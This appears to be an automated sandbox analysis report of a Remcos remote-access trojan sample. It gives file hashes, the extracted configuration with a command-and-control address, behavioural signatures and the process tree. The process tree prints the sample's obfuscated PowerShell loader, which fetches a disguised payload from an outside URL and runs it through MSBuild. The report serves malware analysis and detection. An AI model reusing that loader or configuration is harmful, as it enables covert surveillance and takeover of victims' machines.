remcos | ed7f89f0ac458f6347a838703dde8fad21227620b836970cb83e3030244e22a7

Analysis

max time kernel
149s
max time network
149s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
19-04-2024 13:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fa5da3d28e0cef76033130da3b8eef63_JaffaCakes118.exe
Size

108KB
MD5

fa5da3d28e0cef76033130da3b8eef63
SHA1

6dc00e91c4ce1a264ab281e0990644e7fadeb58b
SHA256

ed7f89f0ac458f6347a838703dde8fad21227620b836970cb83e3030244e22a7
SHA512

d3a5a4aba0666c2c14aae54d9ae1657bada6a770502f3baa1bff5c027453f51eb0649369a3453ba6b63311e73ab1aef01baffab72528a13914707db949718996
SSDEEP

1536:LTSpG2bEOFPX53rseoINqmxnWh9W78a1JYAbxaL5FwYc7BTx:6pXEuf53X9N7WhsAYNcFGj

Score

10^/10

remcos support8 rat

Malware Config

Extracted

Family

remcos

Version

3.1.4 Pro

Botnet

Support8

5.61.52.60:8008

Attributes

audio_folder
MicRecords
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
install_path
%AppData%
keylog_crypt
false
keylog_file
1.bin
keylog_flag
false
keylog_folder
TeamViewer
keylog_path
%Temp%
mouse_option
false
mutex
-0P6NO9
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
remcos
take_screenshot_option
false
take_screenshot_time
5
take_screenshot_title
wikipedia;solitaire;

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

3 2380 powershell.exe
5 2380 powershell.exe
Drops startup file 1 IoCs

Processes:

MSBuild.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sysntfy.lnk MSBuild.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

MSBuild.exe

description pid process target process

PID 2172 set thread context of 2304 2172 MSBuild.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2380 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2380 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

RegAsm.exe

pid process

2304 RegAsm.exe

flow	pid	process
3	2380	powershell.exe
5	2380	powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sysntfy.lnk	MSBuild.exe

description	pid	process	target process
PID 2172 set thread context of 2304	2172	MSBuild.exe	RegAsm.exe

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
2380	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2380	powershell.exe

pid	process
2304	RegAsm.exe

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

fa5da3d28e0cef76033130da3b8eef63_JaffaCakes118.exepowershell.exeMSBuild.execsc.exe

description	pid	process	target process
PID 1888 wrote to memory of 2380	1888	fa5da3d28e0cef76033130da3b8eef63_JaffaCakes118.exe	powershell.exe
PID 1888 wrote to memory of 2380	1888	fa5da3d28e0cef76033130da3b8eef63_JaffaCakes118.exe	powershell.exe
PID 1888 wrote to memory of 2380	1888	fa5da3d28e0cef76033130da3b8eef63_JaffaCakes118.exe	powershell.exe
PID 2380 wrote to memory of 2172	2380	powershell.exe	MSBuild.exe
PID 2380 wrote to memory of 2172	2380	powershell.exe	MSBuild.exe
PID 2380 wrote to memory of 2172	2380	powershell.exe	MSBuild.exe
PID 2380 wrote to memory of 2172	2380	powershell.exe	MSBuild.exe
PID 2172 wrote to memory of 1860	2172	MSBuild.exe	csc.exe
PID 2172 wrote to memory of 1860	2172	MSBuild.exe	csc.exe
PID 2172 wrote to memory of 1860	2172	MSBuild.exe	csc.exe
PID 2172 wrote to memory of 1860	2172	MSBuild.exe	csc.exe
PID 1860 wrote to memory of 996	1860	csc.exe	cvtres.exe
PID 1860 wrote to memory of 996	1860	csc.exe	cvtres.exe
PID 1860 wrote to memory of 996	1860	csc.exe	cvtres.exe
PID 1860 wrote to memory of 996	1860	csc.exe	cvtres.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe
PID 2172 wrote to memory of 2304	2172	MSBuild.exe	RegAsm.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\fa5da3d28e0cef76033130da3b8eef63_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\fa5da3d28e0cef76033130da3b8eef63_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hKhHhrikpwJbKtBlzZYmwStZxOPlpFQAuxPHpdmSeUM=New-Object -c WinHttp.'WinHttpRequest'.'5'.'1';$hKhHhrikpwJbKtBlzZYmwStZxOPlpFQAuxPHpdmSeUM.'open'('GET','https://i.imgur.com/0imBdaE.png',$False);$hKhHhrikpwJbKtBlzZYmwStZxOPlpFQAuxPHpdmSeUM.'send'();$eiIxXtOAHuuiprhjtCWUJGjHnETWwNfiBgoQPqRSBe=New-Object -c ADODB.'Stream';$eiIxXtOAHuuiprhjtCWUJGjHnETWwNfiBgoQPqRSBe.'Type'=1;$eiIxXtOAHuuiprhjtCWUJGjHnETWwNfiBgoQPqRSBe.'Open'();$eiIxXtOAHuuiprhjtCWUJGjHnETWwNfiBgoQPqRSBe.'Write'($hKhHhrikpwJbKtBlzZYmwStZxOPlpFQAuxPHpdmSeUM.'responseBody');$eiIxXtOAHuuiprhjtCWUJGjHnETWwNfiBgoQPqRSBe.'SaveToFile'($env:UserProfile+'\dKetFxdHYeDOCUPbBdRQNfzrJaoQMIrnQzPFcGxaVtmoXdBZzlf.zip',2);$ifZpzqhTSqhacxZbksASeTomGicru=New-Object -c shell.'application';$ifZpzqhTSqhacxZbksASeTomGicru.'NameSpace'($env:UserProfile+'\').'CopyHere'($ifZpzqhTSqhacxZbksASeTomGicru.'NameSpace'($env:UserProfile+'\dKetFxdHYeDOCUPbBdRQNfzrJaoQMIrnQzPFcGxaVtmoXdBZzlf.zip').'Items'(), 4);(New-Object -c Wscript.Shell).run('\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe '+[char]34+$env:UserProfile+'\sysntfy.lnk'+[char]34,0,$True);remove-item($env:UserProfile+'\sysntfy.lnk')
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2380

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" "C:\Users\Admin\sysntfy.lnk"
3⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2172

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\40qovzne\40qovzne.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1860

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4634.tmp" "c:\Users\Admin\AppData\Local\Temp\40qovzne\CSCA60A0CAA2CD0405E984F65456F83357.TMP"
5⤵
PID:996

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:2304

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\40qovzne\40qovzne.dll
Filesize
464KB

MD5
ecf5bc3127a9a555f8de601585d7b25e

SHA1
d39e9b07bd4da13b976c0366b3d3533dae6c3d64

SHA256
c96dc7eae0a16e7d48578c27afcee8ce630770c3bf6c62d95187267b375d709d

SHA512
ea13a636d60d9cee64f5f2e1d0d35a8a4f5bbc5db2d7f612b323e5c98f6ce96395f3f27c9be5f8b31b3aa343026b74778bae3f6248f476ada06933229387e55e

Download Submit
C:\Users\Admin\AppData\Local\Temp\40qovzne\40qovzne.pdb
Filesize
13KB

MD5
ef0a03d58279e5b182ae0f96f2f37172

SHA1
5d9a78a16714e91e8e32942d9ebbd9e1096d58e0

SHA256
f1a9672523c9867776ee3f8266d005469e5927ef09057abf2bb163d21f10d94f

SHA512
8ea5ad9da3a4f002567e07bbd119a5176549ef737841a668b152bcdf4f8e8ccc8543f3d2d596224ec1b049524f3c05ce06ec519dc0233d7e0c37488b5a15481a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4634.tmp
Filesize
1KB

MD5
5d549f9de47108750cc39e116bc5d1fa

SHA1
f5fb5553be6fcc45db801613380059281131d89c

SHA256
d05e5e02f08d0a0482eff50ca51a82a299ecc86adbd9524e7ba7bbba7a0ea611

SHA512
264bb2e4d84f79821d46eac6c18903b3bd1aaffc13f6a6d17746cd9c4ae126ec46d6cd3ccd6e3d41eef8bb258a9a26a70881352a533694ee627d7a91cb855e3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3AE5.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TeamViewer\1.bin
Filesize
148B

MD5
d3159941c40162594659f6bb010fc187

SHA1
ca95e5c028a1dd67afe0a344513fa68972d1ffa1

SHA256
b3203a1e3b3149e05fa0f5f3901825fa2da409b11efacef8a347eecc573f4b6b

SHA512
d26f81019979122928ea5ae4be244e4b39066f44e0f31fda7b3c8cb781fbe7898b1b7de8b89d57d5d0fbc248a4be2d0524c2b2b3559df99d0f36c25be1596d2f

Download Submit
C:\Users\Admin\DKETFX~1.ZIP
Filesize
534KB

MD5
a716c10283d56f5303c0541c03d0fd51

SHA1
caab13b16cb3ef7b168ab4544b09f1983b344ccb

SHA256
8b3aa653b81edcf872e82dd8942b73c021c83ca2c2f60bf70492b04056a6924b

SHA512
400410d417d3ea01f87cade3da14d2e765bd64a97485f67d36fb4e284db793db5e0430ce3e7e6c5a35fb0b1528caa5c91ac39d450eb1a09d4581e7ec09e18c78

Download Submit
C:\Users\Admin\sysntfy.lnk
Filesize
1.6MB

MD5
498d4c9c662e78561930b41418d40d44

SHA1
d1b0a262172ed61b732ef6f7040d2daf3221dea0

SHA256
f548b33706572bcbd52995b70d88e5e00258bfaab77bd4f00c2544f6a1b7949b

SHA512
ddbef3bd7769ba605dbd771d606ad95123ced587149a967d084ac34743f5b8f9cf1108095c8132ac59695699b5706f058e9601073f3ea5c82b50ace6d876456c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\40qovzne\40qovzne.0.cs
Filesize
1.6MB

MD5
48a0421861ecccac6e968cea0805c94e

SHA1
91fbde5f0253c99837aea3723da56e558b9d1320

SHA256
d8df812ffef24f7f706b2efe2d43a3f483dc52389a63805c0b06a54196d09139

SHA512
2f4c1818abd43627027739a7339ddf38c26dbd25d63fcc521825165d0c9e57ce261fbb80c683f3c5bf05779e14bc368477f843b0311cb0bd285446567f22fd72

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\40qovzne\40qovzne.cmdline
Filesize
660B

MD5
a0717088b5f3b20ed262b2c1b67ce340

SHA1
70729b7f1a43a0d18bc6efdbf1605a6826b427c5

SHA256
97343093f426afc11c18c13cf9ac11d759c3460634c96c740a9b2de22dddce5f

SHA512
9ac84ff80dfda59c22833684d857751e9e44fdd8160a2e401d18495f45c0b65390b17c7f91807389f7d1f00cd4dddacb86f14e6a24372f2de32ac99f3ef1f8af

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\40qovzne\CSCA60A0CAA2CD0405E984F65456F83357.TMP
Filesize
652B

MD5
8d5ad05023a03432820d172951b1c7c6

SHA1
aef4c9dc42cdb90440857abbcd310633542285cd

SHA256
762de769e4a277433a4a9aa4005ef917447e9af7755c851b815d23df846a05f8

SHA512
07db8347486554236c567c051e6eca769d7f7588e88872b40efdcfebfba39713f240b1f5c266d575be80ee6a710007ee21732e49923b54ceb34b21c8ab054fba

Download Submit
memory/1888-1-0x000007FEF5B40000-0x000007FEF652C000-memory.dmp

Filesize
9.9MB

Download
memory/1888-2-0x000000001B9A0000-0x000000001BA20000-memory.dmp

Filesize
512KB

Download
memory/1888-3-0x000007FEF5B40000-0x000007FEF652C000-memory.dmp

Filesize
9.9MB

Download
memory/1888-0-0x0000000000F10000-0x0000000000F30000-memory.dmp

Filesize
128KB

Download
memory/2172-94-0x00000000048B0000-0x000000000492A000-memory.dmp

Filesize
488KB

Download
memory/2172-101-0x00000000007B0000-0x00000000007B1000-memory.dmp

Filesize
4KB

Download
memory/2172-74-0x00000000048B0000-0x00000000049D2000-memory.dmp

Filesize
1.1MB

Download
memory/2172-75-0x0000000005600000-0x0000000005722000-memory.dmp

Filesize
1.1MB

Download
memory/2172-76-0x0000000000920000-0x0000000000964000-memory.dmp

Filesize
272KB

Download
memory/2172-77-0x0000000000300000-0x000000000031A000-memory.dmp

Filesize
104KB

Download
memory/2172-78-0x0000000006980000-0x0000000006AFA000-memory.dmp

Filesize
1.5MB

Download
memory/2172-79-0x0000000006980000-0x0000000006CE4000-memory.dmp

Filesize
3.4MB

Download
memory/2172-72-0x00000000001B0000-0x00000000001F0000-memory.dmp

Filesize
256KB

Download
memory/2172-71-0x00000000745F0000-0x0000000074CDE000-memory.dmp

Filesize
6.9MB

Download
memory/2172-70-0x00000000001F0000-0x0000000000230000-memory.dmp

Filesize
256KB

Download
memory/2172-117-0x00000000745F0000-0x0000000074CDE000-memory.dmp

Filesize
6.9MB

Download
memory/2304-116-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-119-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-111-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-98-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-99-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-109-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-100-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-103-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-113-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2304-107-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-124-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-123-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-105-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-114-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2304-120-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2380-10-0x0000000002D70000-0x0000000002DF0000-memory.dmp

Filesize
512KB

Download
memory/2380-9-0x000007FEF21F0000-0x000007FEF2B8D000-memory.dmp

Filesize
9.6MB

Download
memory/2380-121-0x000007FEF21F0000-0x000007FEF2B8D000-memory.dmp

Filesize
9.6MB

Download
memory/2380-8-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/2380-13-0x0000000002D70000-0x0000000002DF0000-memory.dmp

Filesize
512KB

Download
memory/2380-12-0x00000000021D0000-0x00000000021D8000-memory.dmp

Filesize
32KB

Download
memory/2380-11-0x0000000002D70000-0x0000000002DF0000-memory.dmp

Filesize
512KB

Download